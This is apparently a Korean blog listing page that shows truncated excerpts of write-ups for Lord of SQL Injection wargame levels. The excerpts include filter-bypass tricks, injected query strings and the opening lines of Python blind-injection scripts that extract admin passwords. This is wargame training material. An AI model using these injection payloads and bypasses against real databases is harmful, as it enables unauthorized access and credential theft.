본문 바로가기

모의해킹

(163)

giant 문제 접근 1. \n, \r, \t 필터링 2. 입력 문자가 1 이상이면 안됨 3. from과 prob 사이에 공백이 필요 공백 우회 %09 : tab %0a : line feed %0b : vertical tab %0c : form feed %0d : carriage return + : 공백

bugbear 문제 접근 1. '(싱글쿼터) 필터링 + substr, ascii, =, or, and, 공백, like, 0x 필터링 2. Blind SQL Injection 2.1 pw의 길이 구하기 or, and 연산자 -> %26%26, || 으로 우회 like, = 연산자 -> in 으로 우회 import requests url = 'https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php?' cookie={"PHPSESSID":"ehfeb49bjnrn7o6flaqbts8u2v"} for i in range(1,100): params ='no=1/**/||/**/id/**/in/**/("admin")/**/%26%26/**/length(p..

darknight 문제 접근 1. 필터링 및 SQL Injection 포인트 찾기 no 파라미터를 통해 SQL 인젝션 공격을 시도하면 될꺼같다. 2. Blind SQL Injection 2.1 admin의 pw 길이 '(싱글 쿼터)가 필터링이 되기 때문에 id like 'admin'을 대신해 admin의 hex 값을 이용해 id like 0x61646 d696 e 사용 import requests url = 'https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?' cookies = {"PHPSESSID":"r1g9lcvjgj13dag8l5migjcus0"} for i in range(100): params = 'no=1 or id like..

golem 문제 접근 1. 연산자 필터링 되어 있음 or 연산자 대신 || 사용, = 연산자 대신 like 함수 사용 2. blind SQL Injection으로 admi의 pw를 구해야 함 2.1 admin pw 길이 구하기 select id from prob_golem where id='guest' and pw=''||id like 'admin' %26%26 length(pw) like '8' import requests url = 'https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?' cookies = {"PHPSESSID":"r1g9lcvjgj13dag8l5migjcus0"} for i in range(100): params = "..

skeleton 문제 접근 1. id는 guest 고정, and 1=0이 참이 되어야 하는 거 같음 select id from prob_skeleton where id='guest' and pw='' or id='admin'%23' and 1=0 id를 admin으로 만들기 위해 pw안에 or 연산자를 사용해 admin으로 만들어 주고 %23으로 and 1=0을 주석 처리 해준다.

vampire 문제 풀이 1. admin의 문자가 있을 시 공백으로 처리됨 admin의 문자가 공백으로 처리되는 과정이 한 번밖에 안 이루어져 이중으로 작성을 하면 된다.

troll 문제 풀이 1. \ , admin 필터링되어 있음 admin으로 로그인을 하기위해 AdmIn으로 우회를 하면 문제가 풀린다(대소문자 우회)

orge 문제 풀이 1. 기본 필터링 + or , and 연산자 필터링 되어 있음 2. id값은 guest로 고정되어 있음 3. admin의 pw을 블라인드 인젝션으로 구해야 함 필터링을 우회하는 쿼리문을 만들어서 응답 값이 admin이 나오는지 확인 admin의 pw 길이 구하기 # 패스워드 길이 구하는 페이로드 import requests url = 'https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?' cookie = {"PHPSESSID":"gfat9jgv8umb9sviam5cmjka0b"} for i in range(1,100): params = "pw='|| id='admin'%26%26 length(pw)='"+str(i) r..

이전 1 ··· 8 9 10 11 12 13 14 ··· 21 다음

티스토리툴바